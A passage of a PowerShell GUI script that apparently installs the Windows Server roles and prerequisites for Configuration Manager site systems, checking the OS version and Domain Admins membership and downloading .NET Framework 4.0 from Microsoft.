$ButtonConfigureSystemManagementContainerComputer.Enabled = $false } 2 { Write-OutputBox -OutputBoxMessage "The current user is not a member of Domain Admins, please run this script as a Domain Admin" -Type "ERROR: " ; $ButtonConfigureSystemManagementContainerComputer.Enabled = $false } } if ($SMCErrorHandler -eq 0) { Configure-SystemManagementContainerComputer } } function Validate-SystemManagementContainerGroup { $SMCErrorHandler = 0 $ShellObject = New-Object -ComObject Wscript.Shell $CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent() $WindowsPrincipal = New-Object System.Security.Principal.WindowsPrincipal($CurrentUser) if ((([System.Environment]::OSVersion.Version).Build -lt 7600) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $SMCErrorHandler = 1 } if(-not($WindowsPrincipal.IsInRole("Domain Admins"))) { $SMCErrorHandler = 2 } switch ($SMCErrorHandler) { 1 { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2008 R2 64-bit and later is supported" -Type "ERROR: " ; $ButtonSystemManagementContainerGroupSearch.Enabled = $false ; $TextBoxSMCGroupSearch.Enabled = $false } 2 { Write-OutputBox -OutputBoxMessage "The current user is not a member of Domain Admins, please run this script as a Domain Admin" -Type "ERROR: " ; $ButtonSystemManagementContainerGroupSearch.Enabled = $false ; $TextBoxSMCGroupSearch.Enabled = $false } } if ($SMCErrorHandler -eq 0) { Configure-SystemManagementContainerGroup } } function Install-CAS { $InstallType = 1 $OSBuild = ([System.Environment]::OSVersion.Version).Build if (($OSBuild -eq 7600) -or ($OSBuild -eq 7601)) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("NET-Framework-Core","BITS","BITS-IIS-Ext","BITS-Compact-Server","RDC","WAS-Process-Model","WAS-Config-APIs","WAS-Net-Environment","Web-Server","Web-ISAPI-Ext","Web-ISAPI-Filter","Web-Net-Ext","Web-ASP-Net","Web-ASP","Web-Windows-Auth","Web-Basic-Auth","Web-URL-Auth","Web-IP-Security","Web-Scripting-Tools","Web-Mgmt-Service","Web-Stat-Compression","Web-Dyn-Compression","Web-Metabase","Web-WMI","Web-HTTP-Redirect","Web-Log-Libraries","Web-HTTP-Tracing") } if ($OSBuild -ge 9200) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("NET-Framework-Core","BITS","BITS-IIS-Ext","BITS-Compact-Server","RDC","WAS-Process-Model","WAS-Config-APIs","WAS-Net-Environment","Web-Server","Web-ISAPI-Ext","Web-ISAPI-Filter","Web-Net-Ext","Web-Net-Ext45","Web-ASP-Net","Web-ASP-Net45","Web-ASP","Web-Windows-Auth","Web-Basic-Auth","Web-URL-Auth","Web-IP-Security","Web-Scripting-Tools","Web-Mgmt-Service","Web-Stat-Compression","Web-Dyn-Compression","Web-Metabase","Web-WMI","Web-HTTP-Redirect","Web-Log-Libraries","Web-HTTP-Tracing","UpdateServices-RSAT","UpdateServices-API","UpdateServices-UI") } $ProgressBar.Maximum = ($WinFeatures | Measure-Object).Count $ProgressPreference = "SilentlyContinue" $WarningPreference = "SilentlyContinue" $ButtonBack.Enabled = $false $ButtonInstallCAS.Enabled = $false $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (-NOT(Get-WindowsFeature -Name $CurrentFeature | Select-Object Name,Installed | Where-Object { $_.Installed -like "true" })) { Write-OutputBox -OutputBoxMessage "Installing role: $($CurrentFeatureDisplayName.DisplayName)" [System.Windows.Forms.Application]::DoEvents() if (([System.Environment]::OSVersion.Version).Build -lt 9200) { Add-WindowsFeature $CurrentFeature | Out-Null } if (([System.Environment]::OSVersion.Version).Build -ge 9200) { if ($CurrentFeature -eq "NET-Framework-Core") { Add-WindowsFeature NET-Framework-Core -ErrorAction SilentlyContinue | Out-Null if (Get-WindowsFeature -Name NET-Framework-Core | Select-Object Name,Installed | Where-Object { $_.Installed -like "false" }) { Write-OutputBox -OutputBoxMessage "Failed to install $($CurrentFeatureDisplayName.DisplayName)" -Type "ERROR: " do { if (([System.Environment]::OSVersion.Version).Build -eq 9600) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 R2 installation media for the '<drive-letter>:\sources\sxs' folder." } if (([System.Environment]::OSVersion.Version).Build -eq 9200) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 installation media for the '<drive-letter>:\sources\sxs' folder." } } until (($SetupDLLocation.Length -gt 0) -and (Test-Path -Path "$($SetupDLLocation.SubString(0,2))\sources\sxs" -ErrorAction SilentlyContinue)) Write-OutputBox -OutputBoxMessage "Installing role with specified source location: $($CurrentFeatureDisplayName.DisplayName)" Add-WindowsFeature NET-Framework-Core -Source $SetupDLLocation } } else { Start-Job -Name $CurrentFeature -ScriptBlock { param( [parameter(Mandatory=$true)] $CurrentFeature ) Add-WindowsFeature $CurrentFeature } -ArgumentList $CurrentFeature | Out-Null Wait-Job -Name $CurrentFeature Remove-Job -Name $CurrentFeature } } } else { Write-OutputBox -OutputBoxMessage "Skipping role (already installed): $($CurrentFeatureDisplayName.DisplayName)" } $ProgressBar.PerformStep() } $ShellObject = New-Object -ComObject Wscript.Shell $PopupContinue = $ShellObject.Popup("Installation completed. Would you like to download the prerequisite files?`n(A connection to the internet connection is required)",0,"Prerequisites",1) if ($PopupContinue -eq 1) { Get-PrereqFiles Write-OutputBox -OutputBoxMessage "Starting verification that all features where successfully installed" $ErrorVerify = 0 $ProgressBar.Value = 0 $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (Get-WindowsFeature $CurrentFeature | Where-Object { $_.Installed -eq $true}) { Write-OutputBox -OutputBoxMessage "Verified installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } else { $ErrorVerify++ Write-OutputBox -OutputBoxMessage "Feature not installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } } if ($ErrorVerify -eq 0) { Write-OutputBox -OutputBoxMessage "Successfully installed all required Windows Features" } else { Write-OutputBox -OutputBoxMessage "One or more Windows Features was not installed" } } else { Write-OutputBox -OutputBoxMessage "Starting verification that all features where successfully installed" $ErrorVerify = 0 $ProgressBar.Value = 0 $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (Get-WindowsFeature $CurrentFeature | Where-Object { $_.Installed -eq $true}) { Write-OutputBox -OutputBoxMessage "Verified installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } else { $ErrorVerify++ Write-OutputBox -OutputBoxMessage "Feature not installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } } if ($ErrorVerify -eq 0) { Write-OutputBox -OutputBoxMessage "Successfully installed all required Windows Features" } else { Write-OutputBox -OutputBoxMessage "One or more Windows Features was not installed" } $ButtonBack.Enabled = $true $Form.Controls.Remove($ButtonInstallCAS) $Form.Controls.Add($ButtonFinish) } $InstallType = 0 } function Install-Primary { $InstallType = 2 $OSBuild = ([System.Environment]::OSVersion.Version).Build if (($OSBuild -eq 7600) -or ($OSBuild -eq 7601)) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("NET-Framework-Core","BITS","BITS-IIS-Ext","BITS-Compact-Server","RDC","WAS-Process-Model","WAS-Config-APIs","WAS-Net-Environment","Web-Server","Web-ISAPI-Ext","Web-ISAPI-Filter","Web-Net-Ext","Web-ASP-Net","Web-ASP","Web-Windows-Auth","Web-Basic-Auth","Web-URL-Auth","Web-IP-Security","Web-Scripting-Tools","Web-Mgmt-Service","Web-Stat-Compression","Web-Dyn-Compression","Web-Metabase","Web-WMI","Web-HTTP-Redirect","Web-Log-Libraries","Web-HTTP-Tracing") } if ($OSBuild -ge 9200) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("NET-Framework-Core","BITS","BITS-IIS-Ext","BITS-Compact-Server","RDC","WAS-Process-Model","WAS-Config-APIs","WAS-Net-Environment","Web-Server","Web-ISAPI-Ext","Web-ISAPI-Filter","Web-Net-Ext","Web-Net-Ext45","Web-ASP-Net","Web-ASP-Net45","Web-ASP","Web-Windows-Auth","Web-Basic-Auth","Web-URL-Auth","Web-IP-Security","Web-Scripting-Tools","Web-Mgmt-Service","Web-Stat-Compression","Web-Dyn-Compression","Web-Metabase","Web-WMI","Web-HTTP-Redirect","Web-Log-Libraries","Web-HTTP-Tracing","UpdateServices-RSAT","UpdateServices-API","UpdateServices-UI") } $ProgressBar.Maximum = ($WinFeatures | Measure-Object).Count $ProgressPreference = "SilentlyContinue" $WarningPreference = "SilentlyContinue" $ButtonBack.Enabled = $false $ButtonInstallPrimarySite.Enabled = $false $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (-NOT(Get-WindowsFeature -Name $CurrentFeature | Select-Object Name,Installed | Where-Object { $_.Installed -like "true" })) { Write-OutputBox -OutputBoxMessage "Installing role: $($CurrentFeatureDisplayName.DisplayName)" [System.Windows.Forms.Application]::DoEvents() if (([System.Environment]::OSVersion.Version).Build -lt 9200) { Add-WindowsFeature $CurrentFeature | Out-Null } if (([System.Environment]::OSVersion.Version).Build -ge 9200) { if ($CurrentFeature -eq "NET-Framework-Core") { Add-WindowsFeature NET-Framework-Core -ErrorAction SilentlyContinue | Out-Null if (Get-WindowsFeature -Name NET-Framework-Core | Select-Object Name,Installed | Where-Object { $_.Installed -like "false" }) { Write-OutputBox -OutputBoxMessage "Failed to install $($CurrentFeatureDisplayName.DisplayName)" -Type "ERROR: " do { if (([System.Environment]::OSVersion.Version).Build -eq 9600) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 R2 installation media for the '<drive-letter>:\sources\sxs' folder." } if (([System.Environment]::OSVersion.Version).Build -eq 9200) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 installation media for the '<drive-letter>:\sources\sxs' folder." } } until (($SetupDLLocation.Length -gt 0) -and (Test-Path -Path "$($SetupDLLocation.SubString(0,2))\sources\sxs" -ErrorAction SilentlyContinue)) Write-OutputBox -OutputBoxMessage "Installing role with specified source location: $($CurrentFeatureDisplayName.DisplayName)" Add-WindowsFeature NET-Framework-Core -Source $SetupDLLocation } } else { Start-Job -Name $CurrentFeature -ScriptBlock { param( [parameter(Mandatory=$true)] $CurrentFeature ) Add-WindowsFeature $CurrentFeature } -ArgumentList $CurrentFeature | Out-Null Wait-Job -Name $CurrentFeature Remove-Job -Name $CurrentFeature } } } else { Write-OutputBox -OutputBoxMessage "Skipping role (already installed): $($CurrentFeatureDisplayName.DisplayName)" } $ProgressBar.PerformStep() } $ShellObject = New-Object -ComObject Wscript.Shell $PopupContinue = $ShellObject.Popup("Installation completed. Would you like to download the prerequisite files?`n(A connection to the internet connection is required)",0,"Prerequisites",1) if ($PopupContinue -eq 1) { Get-PrereqFiles Write-OutputBox -OutputBoxMessage "Starting verification that all features where successfully installed" $ErrorVerify = 0 $ProgressBar.Value = 0 $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (Get-WindowsFeature $CurrentFeature | Where-Object { $_.Installed -eq $true}) { Write-OutputBox "Verified installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } else { $ErrorVerify++ Write-OutputBox "Feature not installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } } if ($ErrorVerify -eq 0) { Write-OutputBox -OutputBoxMessage "Successfully installed all required Windows Features" } else { Write-OutputBox -OutputBoxMessage "One or more Windows Features was not installed" } } else { Write-OutputBox -OutputBoxMessage "Starting verification that all features where successfully installed" $ErrorVerify = 0 $ProgressBar.Value = 0 $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (Get-WindowsFeature $CurrentFeature | Where-Object { $_.Installed -eq $true}) { Write-OutputBox "Verified installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } else { $ErrorVerify++ Write-OutputBox "Feature not installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } } if ($ErrorVerify -eq 0) { Write-OutputBox -OutputBoxMessage "Successfully installed all required Windows Features" } else { Write-OutputBox -OutputBoxMessage "One or more Windows Features was not installed" } $ButtonBack.Enabled = $true $Form.Controls.Remove($ButtonInstallPrimarySite) $Form.Controls.Add($ButtonFinish) } $InstallType = 0 } function Install-Secondary { $OSBuild = ([System.Environment]::OSVersion.Version).Build if (($OSBuild -eq 7600) -or ($OSBuild -eq 7601)) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("NET-Framework-Core","BITS","BITS-IIS-Ext","BITS-Compact-Server","RDC","WAS-Process-Model","WAS-Config-APIs","WAS-Net-Environment","Web-Server","Web-ISAPI-Ext","Web-Windows-Auth","Web-Basic-Auth","Web-URL-Auth","Web-IP-Security","Web-Scripting-Tools","Web-Mgmt-Service","Web-Metabase","Web-WMI") } if ($OSBuild -ge 9200) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("NET-Framework-Core","BITS","BITS-IIS-Ext","BITS-Compact-Server","RDC","WAS-Process-Model","WAS-Config-APIs","WAS-Net-Environment","Web-Server","Web-ISAPI-Ext","Web-Windows-Auth","Web-Basic-Auth","Web-URL-Auth","Web-IP-Security","Web-Scripting-Tools","Web-Mgmt-Service","Web-Metabase","Web-WMI") } $ProgressBar.Maximum = ($WinFeatures | Measure-Object).Count $ProgressPreference = "SilentlyContinue" $WarningPreference = "SilentlyContinue" $ButtonBack.Enabled = $false $ButtonInstallSecondarySite.Enabled = $false $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (-NOT(Get-WindowsFeature -Name $CurrentFeature | Select-Object Name,Installed | Where-Object { $_.Installed -like "true" })) { Write-OutputBox -OutputBoxMessage "Installing role: $($CurrentFeatureDisplayName.DisplayName)" [System.Windows.Forms.Application]::DoEvents() if (([System.Environment]::OSVersion.Version).Build -lt 9200) { Add-WindowsFeature $CurrentFeature | Out-Null } if (([System.Environment]::OSVersion.Version).Build -ge 9200) { if ($CurrentFeature -eq "NET-Framework-Core") { Add-WindowsFeature NET-Framework-Core -ErrorAction SilentlyContinue | Out-Null if (Get-WindowsFeature -Name NET-Framework-Core | Select-Object Name,Installed | Where-Object { $_.Installed -like "false" }) { Write-OutputBox -OutputBoxMessage "Failed to install $($CurrentFeatureDisplayName.DisplayName)" -Type "ERROR: " do { if (([System.Environment]::OSVersion.Version).Build -eq 9600) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 R2 installation media for the '<drive-letter>:\sources\sxs' folder." } if (([System.Environment]::OSVersion.Version).Build -eq 9200) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 installation media for the '<drive-letter>:\sources\sxs' folder." } } until (($SetupDLLocation.Length -gt 0) -and (Test-Path -Path "$($SetupDLLocation.SubString(0,2))\sources\sxs" -ErrorAction SilentlyContinue)) Write-OutputBox -OutputBoxMessage "Installing role with specified source location: $($CurrentFeatureDisplayName.DisplayName)" Add-WindowsFeature NET-Framework-Core -Source $SetupDLLocation } } else { Start-Job -Name $CurrentFeature -ScriptBlock { param( [parameter(Mandatory=$true)] $CurrentFeature ) Add-WindowsFeature $CurrentFeature } -ArgumentList $CurrentFeature | Out-Null Wait-Job -Name $CurrentFeature Remove-Job -Name $CurrentFeature } } } else { Write-OutputBox -OutputBoxMessage "Skipping role (already installed): $($CurrentFeatureDisplayName.DisplayName)" } $ProgressBar.PerformStep() } Write-OutputBox -OutputBoxMessage "Starting verification that all features where successfully installed" $ErrorVerify = 0 $ProgressBar.Value = 0 $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (Get-WindowsFeature $CurrentFeature | Where-Object { $_.Installed -eq $true}) { Write-OutputBox "Verified installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } else { $ErrorVerify++ Write-OutputBox "Feature not installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } } if ($ErrorVerify -eq 0) { Write-OutputBox -OutputBoxMessage "Successfully installed all required Windows Features" } else { Write-OutputBox -OutputBoxMessage "One or more Windows Features was not installed" } $ButtonBack.Enabled = $true $Form.Controls.Remove($ButtonInstallSecondarySite) $Form.Controls.Add($ButtonFinish) } function Install-AppCat { $OSBuild = ([System.Environment]::OSVersion.Version).Build if (($OSBuild -eq 7600) -or ($OSBuild -eq 7601)) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("NET-Framework-Core","NET-HTTP-Activation","NET-Non-HTTP-Activ","RDC","WAS","WAS-Process-Model","WAS-NET-Environment","WAS-Config-APIs","Web-Server","Web-WebServer","Web-Common-Http","Web-Static-Content","Web-Default-Doc","Web-App-Dev","Web-ASP-Net","Web-Net-Ext","Web-ISAPI-Ext","Web-ISAPI-Filter","Web-Security","Web-Windows-Auth","Web-Filtering","Web-Mgmt-Tools","Web-Mgmt-Console","Web-Scripting-Tools","Web-Mgmt-Compat","Web-Metabase","Web-Lgcy-Mgmt-Console","Web-Lgcy-Scripting","Web-WMI") } if ($OSBuild -ge 9200) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("NET-Framework-Features","NET-Framework-Core","NET-HTTP-Activation","NET-Non-HTTP-Activ","NET-WCF-Services45","NET-WCF-HTTP-Activation45","RDC","WAS","WAS-Process-Model","WAS-NET-Environment","WAS-Config-APIs","Web-Server","Web-WebServer","Web-Common-Http","Web-Static-Content","Web-Default-Doc","Web-App-Dev","Web-ASP-Net","Web-ASP-Net45","Web-Net-Ext","Web-Net-Ext45","Web-ISAPI-Ext","Web-ISAPI-Filter","Web-Security","Web-Windows-Auth","Web-Filtering","Web-Mgmt-Tools","Web-Mgmt-Console","Web-Scripting-Tools","Web-Mgmt-Compat","Web-Metabase","Web-Lgcy-Mgmt-Console","Web-Lgcy-Scripting","Web-WMI") } $ProgressBar.Maximum = ($WinFeatures | Measure-Object).Count $ProgressPreference = "SilentlyContinue" $WarningPreference = "SilentlyContinue" $ButtonBack.Enabled = $false $ButtonInstallAppCat.Enabled = $false $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (-NOT(Get-WindowsFeature -Name $CurrentFeature | Select-Object Name,Installed | Where-Object { $_.Installed -like "true" })) { Write-OutputBox -OutputBoxMessage "Installing role: $($CurrentFeatureDisplayName.DisplayName)" [System.Windows.Forms.Application]::DoEvents() if (([System.Environment]::OSVersion.Version).Build -lt 9200) { Add-WindowsFeature $CurrentFeature | Out-Null } if (([System.Environment]::OSVersion.Version).Build -ge 9200) { if ($CurrentFeature -eq "NET-Framework-Core") { Add-WindowsFeature NET-Framework-Core -ErrorAction SilentlyContinue | Out-Null if (Get-WindowsFeature -Name NET-Framework-Core | Select-Object Name,Installed | Where-Object { $_.Installed -like "false" }) { Write-OutputBox -OutputBoxMessage "Failed to install $($CurrentFeatureDisplayName.DisplayName)" -Type "ERROR: " do { if (([System.Environment]::OSVersion.Version).Build -eq 9600) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 R2 installation media for the '<drive-letter>:\sources\sxs' folder." } if (([System.Environment]::OSVersion.Version).Build -eq 9200) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 installation media for the '<drive-letter>:\sources\sxs' folder." } } until (($SetupDLLocation.Length -gt 0) -and (Test-Path -Path "$($SetupDLLocation.SubString(0,2))\sources\sxs" -ErrorAction SilentlyContinue)) Write-OutputBox -OutputBoxMessage "Installing role with specified source location: $($CurrentFeatureDisplayName.DisplayName)" Add-WindowsFeature NET-Framework-Core -Source $SetupDLLocation } } else { Start-Job -Name $CurrentFeature -ScriptBlock { param( [parameter(Mandatory=$true)] $CurrentFeature ) Add-WindowsFeature $CurrentFeature } -ArgumentList $CurrentFeature | Out-Null Wait-Job -Name $CurrentFeature Remove-Job -Name $CurrentFeature } } } else { Write-OutputBox -OutputBoxMessage "Skipping role (already installed): $($CurrentFeatureDisplayName.DisplayName)" } $ProgressBar.PerformStep() } Write-OutputBox -OutputBoxMessage "Starting verification that all features where successfully installed" $ErrorVerify = 0 $ProgressBar.Value = 0 $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (Get-WindowsFeature $CurrentFeature | Where-Object { $_.Installed -eq $true}) { Write-OutputBox "Verified installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } else { $ErrorVerify++ Write-OutputBox "Feature not installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } } if ($ErrorVerify -eq 0) { Write-OutputBox -OutputBoxMessage "Successfully installed all required Windows Features" } else { Write-OutputBox -OutputBoxMessage "One or more Windows Features was not installed" } $ButtonBack.Enabled = $true $Form.Controls.Remove($ButtonInstallAppCat) $Form.Controls.Add($ButtonFinish) } function Install-MP { $OSBuild = ([System.Environment]::OSVersion.Version).Build if (($OSBuild -eq 7600) -or ($OSBuild -eq 7601)) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("BITS","BITS-IIS-Ext","BITS-Compact-Server","RSAT-Bits-Server","Web-Server","Web-WebServer","Web-ISAPI-Ext","Web-WMI","Web-Metabase","Web-Windows-Auth","Web-ISAPI-Ext") } if ($OSBuild -ge 9200) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = @("NET-Framework-45-Features","NET-Framework-45-Core","NET-WCF-TCP-PortSharing45","NET-WCF-Services45","BITS","BITS-IIS-Ext","BITS-Compact-Server","RSAT-Bits-Server","Web-Server","Web-WebServer","Web-ISAPI-Ext","Web-WMI","Web-Metabase","Web-Windows-Auth","Web-ISAPI-Ext") } $ProgressBar.Maximum = ($WinFeatures | Measure-Object).Count $ProgressPreference = "SilentlyContinue" $WarningPreference = "SilentlyContinue" $ButtonBack.Enabled = $false $ButtonInstallMP.Enabled = $false $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (-NOT(Get-WindowsFeature -Name $CurrentFeature | Select-Object Name,Installed | Where-Object { $_.Installed -like "true" })) { Write-OutputBox -OutputBoxMessage "Installing role: $($CurrentFeatureDisplayName.DisplayName)" [System.Windows.Forms.Application]::DoEvents() if (([System.Environment]::OSVersion.Version).Build -lt 9200) { Add-WindowsFeature $CurrentFeature | Out-Null } if (([System.Environment]::OSVersion.Version).Build -ge 9200) { if ($CurrentFeature -eq "NET-Framework-Core") { Add-WindowsFeature NET-Framework-Core -ErrorAction SilentlyContinue | Out-Null if (Get-WindowsFeature -Name NET-Framework-Core | Select-Object Name,Installed | Where-Object { $_.Installed -like "false" }) { Write-OutputBox -OutputBoxMessage "Failed to install $($CurrentFeatureDisplayName.DisplayName)" -Type "ERROR: " do { if (([System.Environment]::OSVersion.Version).Build -eq 9600) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 R2 installation media for the '<drive-letter>:\sources\sxs' folder." } if (([System.Environment]::OSVersion.Version).Build -eq 9200) { $SetupDLLocation = Read-FolderBrowserDialog -Message "Browse the Windows Server 2012 installation media for the '<drive-letter>:\sources\sxs' folder." } } until (($SetupDLLocation.Length -gt 0) -and (Test-Path -Path "$($SetupDLLocation.SubString(0,2))\sources\sxs" -ErrorAction SilentlyContinue)) Write-OutputBox -OutputBoxMessage "Installing role with specified source location: $($CurrentFeatureDisplayName.DisplayName)" Add-WindowsFeature NET-Framework-Core -Source $SetupDLLocation } } else { Start-Job -Name $CurrentFeature -ScriptBlock { param( [parameter(Mandatory=$true)] $CurrentFeature ) Add-WindowsFeature $CurrentFeature } -ArgumentList $CurrentFeature | Out-Null Wait-Job -Name $CurrentFeature Remove-Job -Name $CurrentFeature } } } else { Write-OutputBox -OutputBoxMessage "Skipping role (already installed): $($CurrentFeatureDisplayName.DisplayName)" } $ProgressBar.PerformStep() } if ((Get-WmiObject -Namespace root\cimv2 -Class Win32_OperatingSystem).BuildNumber -lt 9200) { $HKLM = "HKEY_LOCAL_MACHINE" $RegKey = "SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" $GetValue = [Microsoft.Win32.Registry]::GetValue("$($HKLM)\$($RegKey)","Install",$Null) $dotNETInstallArgs = "/q /norestart" $ShellObject = New-Object -ComObject Wscript.Shell if ($GetValue -ne 1) { $PopupContinue = $ShellObject.Popup("Would you like to download .NET Framework 4.0 Full?`nPress OK to download the setup or Cancel to `nspecify a location to the setup.",0,"Prerequisites",1) if (($PopupContinue -eq 1) -and ($GetValue -ne 1)) { $dotNETDownloadPath = "C:\Downloads" $dotNETFileName = "dotNetFx40_Full_x86_x64.exe" Write-OutputBox -OutputBoxMessage "Starting download of .NET Framework 4.0 Full to $($dotNETDownloadPath)" -Type "INFO: " Get-WebDownloadFile -URL "http://download.microsoft.com/download/9/5/A/95A9616B-7A37-4AF6-BC36-D6EA96C8DAAE/dotNetFx40_Full_x86_x64.exe" -DownloadFolder $dotNETDownloadPath -FileName $dotNETFileName [System.Windows.Forms.Application]::DoEvents() Write-OutputBox -OutputBoxMessage "Successfully downloaded .NET Framework 4.0 Full" -Type "INFO: " [System.Windows.Forms.Application]::DoEvents() Start-Process -FilePath "$($dotNETDownloadPath)\$($dotNETFileName)" -ArgumentList $dotNETInstallArgs -Wait $dotNETInstallValue = [Microsoft.Win32.Registry]::GetValue("$($HKLM)\$($RegKey)","Install",$Null) if ($dotNETInstallValue -eq 1) { Write-OutputBox -OutputBoxMessage "Successfully installed .NET Framework 4.0" -Type "INFO: " } else { Write-OutputBox -OutputBoxMessage "An error occured during the installation of .NET Framework 4.0 Full, application was not detected" -Type "ERROR: " } } elseif (($PopupContinue -ne 1) -and ($GetValue -ne 1)) { do { $SetupDLNetFramework = Read-FolderBrowserDialog -Message "Select the folder where dotNetFx40_Full_x86_x64.exe is located:" } until (Test-Path -Path "$($SetupDLNetFramework)\dotNetFx40_Full_x86_x64.exe") Write-OutputBox -OutputBoxMessage "Installing .NET Framework 4.0 Full, this will take some time" -Type "INFO: " [System.Windows.Forms.Application]::DoEvents() Start-Process -FilePath "$($SetupDLNetFramework)\dotNetFx40_Full_x86_x64.exe" -ArgumentList $dotNETInstallArgs -Wait $dotNETInstallValue = [Microsoft.Win32.Registry]::GetValue("$($HKLM)\$($RegKey)","Install",$Null) if ($dotNETInstallValue -eq 1) { Write-OutputBox -OutputBoxMessage "Successfully installed .NET Framework 4.0" -Type "INFO: " } else { Write-OutputBox -OutputBoxMessage "An error occured during the installation of .NET Framework 4.0 Full, application was not detected" -Type "ERROR: " } } } elseif ($GetValue -eq 1) { Write-OutputBox -OutputBoxMessage "Detected that .NET Framework 4.0 Full is already installed, skipping install" -Type "INFO: " } } Write-OutputBox -OutputBoxMessage "Starting verification that all features where successfully installed" $ErrorVerify = 0 $ProgressBar.Value = 0 $WinFeatures | ForEach-Object { $CurrentFeature = $_ $CurrentFeatureDisplayName = Get-WindowsFeature | Select-Object Name,DisplayName | Where-Object { $_.Name -like "$($CurrentFeature)"} if (Get-WindowsFeature $CurrentFeature | Where-Object { $_.Installed -eq $true}) { Write-OutputBox "Verified installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } else { $ErrorVerify++ Write-OutputBox "Feature not installed: $($CurrentFeatureDisplayName.DisplayName)" $ProgressBar.PerformStep() } } if ($ErrorVerify -eq 0) { Write-OutputBox -OutputBoxMessage "Successfully installed all required Windows Features" } else { Write-OutputBox -OutputBoxMessage "One or more Windows Features was not installed" } $ButtonBack.Enabled = $true $Form.Controls.Remove($ButtonInstallMP) $Form.Controls.Add($ButtonFinish) } function Install-DP { $OSBuild = ([System.Environment]::OSVersion.Version).Build if (($OSBuild -eq 7600) -or ($OSBuild -eq 7601)) { Write-OutputBox -OutputBoxMessage "Detected OS build version is $($OSBuild) running PowerShell version $($host.Version)" $WinFeatures = 